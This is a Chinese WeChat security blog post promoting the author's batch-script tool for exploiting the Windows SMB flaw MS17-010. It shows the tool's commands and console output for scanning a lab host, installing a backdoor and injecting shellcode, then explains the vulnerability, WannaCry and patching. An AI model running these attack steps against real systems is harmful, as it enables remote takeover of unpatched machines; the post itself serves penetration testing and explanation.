前言
在网络安全领域,从事内网渗透的师傅们对 ms17010 漏洞肯定不陌生。针对这个漏洞,有多种利用工具和方法,比如 Metasploit、Cobalt Strike 插件、fscan、landon 等。这些工具各有优劣,在不同的渗透场景下,选择合适的工具至关重要。 在这里,我想分享一款自己常用的工具,它能帮助我们直接获取交互式 shell,操作便捷高效。有兴趣的师傅,可通过文末的联系方式获取,一起交流探讨。
使用方法
check.bat IP
ms17010.bat IP +系统版本 WIN72K8R2 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
go.bat IP 位数
检测
C:UsersgoodDesktopnwms17-010>check.bat 10.10.10.41
[+] SMB Touch started
[*] TargetIp 10.10.10.41
[*] TargetPort 445
[*] RedirectedTargetIp (null)
[*] RedirectedTargetPort 0
[*] NetworkTimeout 60
[*] Protocol SMB
[*] Credentials Anonymous
[*] Connecting to target...
[+] Initiated SMB connection
[+] Target OS Version 6.1 build 7601
Windows 7 Professional 7601 Service Pack 1
[*] Trying pipes...
[-] spoolss - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] browser - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] lsarpc - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] No pipes accessible
[Not Supported]
ETERNALSYNERGY - Target OS version not supported
[Not Vulnerable]
ETERNALROMANCE - Named pipe required for exploit
[Vulnerable]
ETERNALBLUE - DANE
ETERNALCHAMPION - DANE
[*] Writing output parameters
[+] Target is vulnerable to 2 exploits
[+] Touch completed successfully
攻击
C:UsersgoodDesktopnwms17-010>ms17010.bat IP WIN72K8R2
C:UsersgoodDesktopnwms17-010>go.bat 10.10.10.41 x86
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x894EDE86
SMB Connection string is: Windows 7 Professional 7601 Service Pack 1
Target OS is: 7 x86
Target SP is: 1
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
MS17-010 漏洞是微软在 2017 年 3 月发布的安全公告中披露的一个 Windows 系统漏洞,该漏洞存在于 Windows 的 SMB(Server Message Block)服务中。SMB 是一种网络文件共享协议,用于在计算机之间共享文件、打印机和其他资源。
漏洞原理
攻击者可以利用这个漏洞,在无需用户交互的情况下,通过网络发送特制的数据包,远程执行恶意代码。也就是说,只要目标计算机开启了 SMB 服务且未安装相应的安全补丁,攻击者就有可能利用该漏洞入侵系统。
危害
这个漏洞危害极大,臭名昭著的 WannaCry 勒索病毒就是利用 MS17-010 漏洞进行大规模传播的。一旦计算机被感染,攻击者可以完全控制目标系统,窃取敏感信息、植入恶意软件、进行勒索等操作,对个人、企业甚至国家的信息安全造成严重威胁。
修复措施
为了防范该漏洞,微软已经发布了相应的安全补丁,用户应及时更新 Windows 系统,安装最新的安全补丁,以确保系统安全。同时,还可以通过关闭不必要的 SMB 服务端口等方式来降低风险。
公众号点击与我联系,加好友回复ms17010获取或者后台直接回复ms17010。
原文始发于微信公众号(土拨鼠的安全屋):MS17-010漏洞利用工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论